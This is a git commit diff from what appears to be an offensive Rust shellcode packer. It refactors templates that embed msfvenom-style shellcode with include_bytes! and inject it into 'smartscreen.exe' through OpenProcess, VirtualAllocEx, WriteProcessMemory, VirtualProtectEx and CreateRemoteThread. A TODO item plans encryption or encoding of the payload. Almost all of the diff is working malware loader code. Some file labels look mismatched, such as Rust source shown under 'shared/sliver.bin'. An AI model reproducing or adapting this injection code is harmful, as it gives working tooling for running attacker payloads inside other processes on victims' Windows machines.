Optimized binary file handling with macro

Author: Nariod

Cargo.toml

@@ -10,4 +10,5 @@ clap = "3.2.22"
 random-string = "1.0.0"
 cargo = "0.65.0"
 path-absolutize = "3.0.13"
-fs_extra = "1.2.0"
+fs_extra = "1.2.0"
+path-clean = "0.1.0"

README.md

@@ -56,7 +56,7 @@ You can generate raw MSF shellcode using msfvenom's raw format. Ex:
 - [X] Debug binary file to Vec<u8>
 - [X] Debug compiler -> Done, FFS !
 - [X] Packer POC
-- [ ] Migrate to "std::include_bytes"
+- [X] Migrate to "std::include_bytes"
 - [ ] Add encryption / encoding
 - [X] Build dockerfile
 - [X] Strip output binaries

shared/sliver.bin

@@ -7,7 +7,7 @@ mod shellcode_reader;
 
 fn main() {
     let order = arg_parser::meta_arg_parser();
-    let shellcode = shellcode_reader::meta_shellcode_reader(&order.shellcode_path);
-    let mut output_folder = puzzle::meta_puzzle(order, shellcode);
+    //let shellcode = shellcode_reader::meta_shellcode_reader(&order.shellcode_path);
+    let mut output_folder = puzzle::meta_puzzle(order);
     compiler::meta_compiler(&mut output_folder);
 }

src/main.rs

@@ -7,6 +7,22 @@ use std::io::prelude::*;
 use std::path::Path;
 use std::path::PathBuf;
 use std::str;
+use std::env;
+use std::io;
+use path_clean::PathClean;
+
+pub fn absolute_path(path: impl AsRef<Path>) -> io::Result<PathBuf> {
+    // thanks to https://stackoverflow.com/questions/30511331/getting-the-absolute-path-from-a-pathbuf
+    let path = path.as_ref();
+
+    let absolute_path = if path.is_absolute() {
+        path.to_path_buf()
+    } else {
+        env::current_dir()?.join(path)
+    }.clean();
+
+    Ok(absolute_path)
+}
 
 fn search_and_replace(
     path_to_main: &Path,
@@ -51,7 +67,7 @@ fn copy_template(source: &Path, dest: &Path) -> Result<(), Box<dyn std::error::E
     Ok(())
 }
 
-pub fn meta_puzzle(order: Order, shellcode: Vec<u8>) -> PathBuf {
+pub fn meta_puzzle(order: Order) -> PathBuf {
     println!("[+] Assembling Rust code..");
     let mut general_output_folder = PathBuf::new();
     general_output_folder.push("shared");
@@ -60,8 +76,12 @@ pub fn meta_puzzle(order: Order, shellcode: Vec<u8>) -> PathBuf {
         Execution::CreateThread => Path::new("templates/createThread/."),
         Execution::CreateRemoteThread => Path::new("templates/createRemoteThread/."),
     };
-    let search = "{{shellcode}}";
-    let replace: String = format!("{:?}", &shellcode);
+    let search = "{{PATH_TO_SHELLCODE}}";
+    let absolute_shellcode_path = match absolute_path(order.shellcode_path) {
+        Ok(path) => path,
+        Err(err) => panic!("{:?}", err),
+    };
+    let replace: String = format!("{:?}", &absolute_shellcode_path);
 
     let folder: PathBuf = match create_root_folder(&general_output_folder) {
         Ok(content) => content,

src/puzzle.rs

@@ -6,6 +6,7 @@ use windows::Win32::System::Memory::{MEM_COMMIT, PAGE_EXECUTE_READ, PAGE_READWRI
 use windows::Win32::System::Threading::CreateRemoteThread;
 use windows::Win32::System::Threading::OpenProcess;
 use windows::Win32::System::Threading::PROCESS_ALL_ACCESS;
+use std::include_bytes;
 
 fn boxboxbox(tar: &str) -> Vec<u32> {
     // search for processes to inject into
@@ -22,29 +23,29 @@ fn enhance(buf: &[u8], tar: &u32) {
     // injecting in target processes :)
 
     unsafe {
-        let hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, *tar).unwrap();
-        let resultPtr = VirtualAllocEx(hProcess, None, buf.len(), MEM_COMMIT, PAGE_READWRITE);
+        let h_process = OpenProcess(PROCESS_ALL_ACCESS, false, *tar).unwrap();
+        let result_ptr = VirtualAllocEx(h_process, None, buf.len(), MEM_COMMIT, PAGE_READWRITE);
         let mut byteswritten = 0;
         let _resb = WriteProcessMemory(
-            hProcess,
-            resultPtr,
+            h_process,
+            result_ptr,
             buf.as_ptr() as _,
             buf.len(),
             Some(&mut byteswritten),
         );
         let mut old_perms = PAGE_EXECUTE_READ;
         let _bool = VirtualProtectEx(
-            hProcess,
-            resultPtr,
+            h_process,
+            result_ptr,
             buf.len(),
             PAGE_EXECUTE_READ,
             &mut old_perms,
         );
-        let _resCRT = CreateRemoteThread(
-            hProcess,
+        let _res_crt = CreateRemoteThread(
+            h_process,
             None,
             0,
-            Some(std::mem::transmute(resultPtr)),
+            Some(std::mem::transmute(result_ptr)),
             None,
             0,
             None,
@@ -57,13 +58,13 @@ fn main() {
     // inject in the following processes:
     let tar: &str = "smartscreen.exe";
 
-    let buf: Vec<u8> = vec!{{shellcode}};
+    let buf = include_bytes!({{PATH_TO_SHELLCODE}});
     let list: Vec<u32> = boxboxbox(tar);
     if list.len() == 0 {
         panic!("[-] Unable to find a process.")
     } else {
         for i in &list {
-            enhance(&buf, i);
+            enhance(buf, i);
         }
     }
 }

templates/createRemoteThread/src/main.rs

@@ -5,7 +5,7 @@ use windows::Win32::System::Memory::{MEM_COMMIT, PAGE_EXECUTE_READ, PAGE_READWRI
 use windows::Win32::System::Threading::CreateThread;
 use windows::Win32::System::Threading::WaitForSingleObject;
 use windows::Win32::System::Threading::THREAD_CREATION_FLAGS;
-
+use std::include_bytes;
 
 
 fn enhance(buf: &[u8]) {
@@ -28,6 +28,6 @@ fn enhance(buf: &[u8]) {
     }
 }
 fn main() {
-    let buf: Vec<u8> = vec!{{shellcode}};
-    enhance(&buf);
+    let buf = include_bytes!({{PATH_TO_SHELLCODE}});
+    enhance(buf);
 }